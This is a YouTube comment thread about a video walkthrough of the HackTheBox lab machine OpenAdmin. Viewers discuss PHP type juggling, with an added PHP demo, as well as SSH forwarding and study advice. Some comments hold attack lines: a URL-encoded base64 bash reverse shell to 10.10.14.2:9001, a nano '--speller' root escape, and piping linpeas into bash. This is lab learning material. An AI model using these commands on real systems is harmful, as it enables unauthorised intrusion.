Normal people: "How do I exit vim?"
Ippsec: "How do I exit nano?" xD
Anyways, great vid as always, thanks!
😂😂
He was trying to escape to a shell, not exit 😒
@@kristibegaj608 Congratulations, you pointed out the joke.
The reason why the hash thing wasn't working was that in the PHP script both hashes were strings when being compared, so == just performs a regular string comparison, just like ===.
If you had compared "0" == "00e123asd" instead of 0 == "00e123asd", it wouldn't have evaluated to true either.
Thank you for the video
Alex Terrats Type juggling, right? :)
First box I ever rooted. Nice to see something relatively more "easy" in HTB
The vulnerability you were trying to exploit with '==' and '===' was type juggling. If you had tried comparing an integer with a string, it would have bypassed, like comparing 0 with "00e3eekfkhfk" as you showed in your PHP interactive shell. Effectively, sending 0 {integer} instead of "Revealed" {string} would have bypassed the check with "==". Thanks for the video! The way you tackle the bumps is simply awesome :)
Learned a lot from the video, thank you so much for your work.
Solving a box live without preparation is a lot better, and helps me get better at recon.
movies: Show a hacker using 3 terminals at the same time to hack anything
people: That's not real, there's too much information at the same time.
IppSec: Uses 3 terminals at the same time
people: Wait, that's illegal
There are no matrices running, so he did it wrong :D
This guy has the best HTB videos on YouTube.
best explanations, i just love it.
thank u for ur time, dont stop! :D
Well, RIP more points. Lovely video. I learned a lot from you in the past year. Thank you.
Finally rooted this box myself, took me 5 hours but it's done :)
Been looking forward to watch your approach on this one!
Watching you forget something else with the reverse shell every time you tried was hilarious lol
That thing was funny 🤣🤣🤣
john not autocompleting the wordlist path on pressing tab always drives me mad. I figured that putting a space after the equal fixes this
--wordlist= /usr/share/seclists/...
Very nice box! The reason that allows apache to access joanna's home directory is a virtual host rule, which gives temporary rights to apache as joanna. I was actually curious about it too, and finally figured it out.
Nicely done and thank you for this content, keep up the good work!
Does it use suidcgi?
I thought it was because the file had gid 'internal' and the apache process runs as gid 'internal' too.
The type confusion or type juggling or whatever you want to call it seems to have been fixed in the sense that if you compare two strings that start with a digit, it will only compare them as numbers as long as their numeric representation and string representation are equal (so, '0e2' is treated as a number, but '0ea' is not). This is not the case when comparing a number to a string: in this case it will just read until it encounters an invalid character for a number, cast the read part as a number and then compare to the other side.
If you look closely at 1:00:00 "0" == "0e1idsa" does not work, but 0 == "0e1idsa" works.
Just in case anyone was curious.
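The comparisons the comments above are discussing ("0" == "0e1idsa" versus 0 == "0e1idsa", numeric strings like '0e1' versus '0ea', and what a check should look like instead), as an added PHP example that is not part of the video or of any comment; the function names and the JSON wrapper used to carry an integer are my own assumptions.

```php
<?php
// Added example: PHP's loose comparison on the values discussed in the
// comments, plus a weak check and a hardened check side by side.
// Run it with: php juggling.php (PHP 7.1+; results of the int-vs-string
// cases depend on the PHP major version, see comments below).

// Describe one loose comparison as a printable line.
function describeLoose($left, $right)
{
    $result = ($left == $right) ? 'true' : 'false';
    return sprintf('%s == %s is %s',
        var_export($left, true), var_export($right, true), $result);
}

// Weak check: compares user input with == against the expected value.
// On PHP < 8 an int compared with a non-numeric string converts the
// string to a number (0), so int 0 matches any non-numeric string.
// On PHP 8 the int is cast to a string instead and compared as text.
function weakCheck($input, $expected)
{
    return $input == $expected;
}

// Hardened check: require a string and use hash_equals, which compares
// byte for byte in constant time. No numeric-string rule can apply.
function safeCheck($input, $expected)
{
    return is_string($input) && hash_equals($expected, $input);
}

// Constructed cases mirroring the comments above.
$cases = [
    ['0',   '0e1idsa'],  // two strings, '0e1idsa' is not numeric: string compare
    [0,     '0e1idsa'],  // int vs leading-numeric string: version dependent
    ['0e1', '0e2'],      // two numeric strings: compared as floats (0.0 vs 0.0)
    ['0e1', '0ea'],      // '0ea' is not numeric: string compare
    [0,     'Revealed'], // int vs non-numeric string: version dependent
];
foreach ($cases as [$l, $r]) {
    echo describeLoose($l, $r), PHP_EOL;
}

// Feed the same inputs through both checks. JSON is decoded so that the
// value keeps its type: "0" stays a string, 0 becomes an int.
$expected = 'Revealed';
foreach (['{"token":"Revealed"}', '{"token":0}', '{"token":"0"}'] as $json) {
    $input = json_decode($json, true)['token'];
    printf("input %-10s weak=%-5s safe=%s\n",
        var_export($input, true),
        var_export(weakCheck($input, $expected), true),
        var_export(safeCheck($input, $expected), true));
}
```

Running it under PHP 7 and PHP 8 shows that only the int-vs-string rows change, while the safeCheck column is the same on both.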
Great job dude, one of the best for writeups and all that stuff. It was my first machine from HTB, but with tons of hints and help... You are doing the best job for explaining things.
hah! I was also confused when curling without authentication/credentials gave the key! Thank you for walking through that
At 48:20 I can't get the ~C to do anything. Are those the exact keys, or am I missing something? Can't get the SSH command line to load.
Hello everyone. Even though I don't understand much, I am finding these videos absolutely fascinating. I would really love to learn this. What learning path would you suggest? I have some coding experience (Python, VBA, SQL, nothing fancy). I was thinking of starting with networking and Linux. I also found this thing called CTF, which seems very fun. Looking forward to all your comments. Cheers!
Learning networking and Linux will help pretty much. There are quite good websites to practice besides HTB (TryHackMe, VulnHub).
TryHackMe is much more beginner-friendly. HTB has some easier machines, but to do most of the "easier" boxes you will need to buy VIP.
I started to learn a lot when I tried to actually do the machines, I take notes on everything and always keep searching.
Good luck!
23:38, you had forgotten to start up nc again, that's all. Great video again dude, GG
Top tier hacker. The website is protected. He says this website is horrible. Website gives the password
The one whom I have not seen but I am glad to have him as my mentor 🙏. This man has a deep impact on my life, honestly.
Ipp, the word great is not enough to describe you.
You are the best out there to explain this stuff.
Will you ever make a Udemy course about pentesting or something like that?
As I watch these videos I start to feel that I should start pentesting.
If you want to privesc nano, look at the man page:
You have the '--speller' option, which calls a program to check for spelling mistakes. You can set bash to be the program to check, then press "ctrl+t" in nano to execute the speller, and boom, you get a bash with root privilege :)
The website root-me has a great challenge for privilege escalation, it's called "bash - restricted shells" in the "app-script" challenges.
Good work! At 48:20 what command did you execute to get into SSH command mode?
~C
The webserver serving main.php is actually owned by joanna, so you could have avoided cracking the passphrase of the private certificate and directly had a joanna shell. The reason the process doesn't show up when you run ps could be that you don't have full access to information about processes you don't have access to (similar to what happens with netstat [which actually shows you such a message]).
love this ippsec! Thanks! This was my first box :D
@IppSec 24:00 first you didn't run the python3, then you forgot to listen with nc, and for the bash I think you should have specified /bin/bash.
Thanks for 47:31. First time I did the box, I just curled it easy. Second time, not so much.
I wish I could understand like you...I know it isn't something that comes over-night...I am beginner for this CTF and boxes...Any suggestions on how to build all the concepts I need to root the boxes?
HTB probably isn't the place to actually learn new concepts but more for reinforcing them. I like TryHackMe for actually learning new things.
~c or ~C gives me command not found :/
I did local port forwarding in my Kali (via ssh) but I am curious why the method from ippsec's video does not work on htb machine?
Awesome man, great box too🔥⚡
People are really spoiling the boxes too much. I mean leaving the exploits and all is fine. But I found the root's id_rsa private key in the tmp folder in forwardslash. 😂 No wonder someone did that on purpose, cuz that box doesn't have anything like reading files to get root.
What do you mean? You can escape out of nano and get root :)
This is the best thing in hack the box 😂😂😂
@@ippsec he is saying about the forwardslash box i guess 🙄
I don't think someone did that on purpose, that key needed to be mounted. Which is not much of a spoiler I hope, @IppSec please remove my comment if you feel otherwise.
You're awesome 🔥
I was going to watch The Matrix, but now that I found this, I'm watching this instead! Now let me get my popcorn and rootbeer! 💗 🍿
How do you get SSH command mode? (48:27)
I can't get the SSH local port forward to work. Squiggly + C doesn't cut the mustard for me. It hurts my brain. How did you authenticate the connection? I currently believe you are local port forwarding on the OpenAdmin box right? On the OpenAdmin box you are saying if anything comes in on 9002 > send it to > 52846. When then back on your client does local host work for you rather than 10.10.10.171:9002?
Thank you. You doing awesome work.
Not gonna watch it, already solved this box, but it's still live, I did think it was allowed to post guides for live boxes. Well, maybe I should watch, I am sure I will learn something new, your videos are great.
Personally, I watch other videos/read writeups on boxes that I solved, because I love seeing what people did different and if their approach was any better. This box retired today, boxes retire 4 hours prior to the weekly release, so people can learn from the retired machine while waiting for the new machine to be launched.
@@ippsec Cool, I love your videos, I have been using them as part of my prep for OSCP which is on Monday. Any boxes you would suggest going through at the last minute?
@@bugeyemonster IMO you shouldn't be just racing through boxes if your OSCP is on Monday. Chill out and go through your notes. If you have solved TJ Null's OSCP list and can solve HackTheBox's active boxes on your own, you are good to go. Just make sure you identify the bad characters well in the buffer overflow :p or you would be wasting a lot of time. The OSCP exam isn't really that hard if you are ready. Good luck!!
@@bugeyemonster hackthebox's easy-medium boxes*
@@thev01d12 sound advice :)
So I was doing the same thing to get a proper reverse shell from the single-command shell. I tried to upload a Python rev shell file, but I did it using wget and it didn't work, but after watching this video, trying it with curl works. Any idea why?
At 17:19 base64 did work, but because cURL did this by passing it in the URL, URL encoding is needed. I did this ===> echo%20YmFzaCAtYyAnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMSc%3d|base64%20-d|bash
How are we searching inside the linPEAS output?
Hello,
hoca, can I search the terminal output? Is there a shortcut key for it?
Anyone recommend what to do if when you run linpeas on the server nothing happens?
Piped it to bash?
x.x.x.x/linpeas.sh | bash
Perl reverse shell works as well.
you are the best keep it up!!!!!!
your videos are great!
Good work, but not like usual, got a headache :))
I spent like 20 hours trying to root this and still failed. Can anybody tell me if it gets easier, and if so how long does it take?
URL encoding worked for me as a reverse shell option with the bash command.
Many people rooted the box only from the www-data shell, skipping the user. Anyone know how?
Thank you for the video.
Is this actually easy😥??
To be fair, OpenAdmin is on the 'harder' end of easy. This box didn't require huge amounts of technical skill. It more required familiarity with a number of things: Linux; Linux commands to sift through all the information a user can access; ports, and when a port is doing something 'suspicious'.
I personally find that Linux machines on HTB are always that bit more difficult than they are otherwise rated to be. If you're looking for easy machines, I'd recommend attacking Windows machines that are rated easy, as they seem to be more accurate.
Don't feel disheartened if you're just starting out and watch videos like this either. IppSec is so good at what he does that he does EASY boxes his own HARD way, so we can learn alternative methods.
@@user-sl7oz1fh1s This is exactly what I was looking for, as I am a beginner and tried for like 2 days for this box and just got a shell... failed to locate the SSH key... here I was seeing all the comments saying "easy" and got discouraged, but after your message... I think I just don't know it yet. (Will get better soon :)
@@user-sl7oz1fh1s Thanks for the advice man
Why not just use the Metasploit payload??
If you do the OSCP, you are not allowed to use msf. Also it's much smarter to understand the concept than to use finished scripts :)
Omg are those points gone as well? How do you guys ever get to thousands of points?
There will be no Saturday Livestream? 🙁
Nope. No real motivation to do livestreams anymore, using the time to work on some personal projects that I don't want to be public.
@@ippsec Kind of sad for me. But wishing luck for your project 🤗
Great stuff!
This was my first root own :)
How come john and hashcat couldn't crack that SHA-512 but a website had it. Smh
I believe it's how the hash is being shown. I.e. sha512sum looked to be about half the length, so I'm guessing it's being shown in hex form.
Totally don't understand why this was classified as an EASY box!
Sorry for that potato English.
Guys, I hope you can help me.
I'm working on a box. I got access as daemon but I don't have a bash shell; I wasn't able to get a reverse shell at all.
But I was able to upload a PHP webshell. The version of the kernel is too outdated, and I have the creds of a user, and this user has a bash shell.
The problem is I don't know how to run my local exploit without getting a reverse shell.
Also SSH is closed, so I can't log in as the user.
BUT I FOUND something interesting: MySQL has a bash shell...
Please, can you help me, guys?
57:26 🤣🤣
I hacked the box in one shot, in about 40 mins or less, and I am a dummy lol, congratulate me :(
awesome
Haha, at 23:30 you didn't listen with netcat.
Ha. Thankfully, it didn't delay me too much. Was disappointed I forgot about URL Encoding, figured curl would do a good enough job. That alone would have shortened the video by like 20 minutes. Oh well, still would have gotten the bloods if I could compete :).
@@ippsec 😂😂😂😂
Lol, I spent 3 hrs down a rabbit-hole exploit.
It was ez pz tbh
Do sauna
First Comment first like 😁
Watching you not being able to type simple commands is brutal. It seems you're just blindly poking at boxes and hoping to get lucky. Most of the time you're just fucking things up or missing info because you're going too fast.
47:57 tbh... showing how an exploit is found/why it works is all cool. When you go into explaining how they "should" have stopped it you are going beyond scope and length for this video. Thumbs down.
What good is knowing how to exploit things, if you don't also know how to prevent it? A pentest report that just shows vulnerabilities and no detailed information on how to prevent it is pretty meaningless. If the video is too long for you because of this information, just use the timestamps in the description to jump to the next chapter.
@@ippsec I guess I'm just a complainer. I didn't really give it a thumbs down either way. xD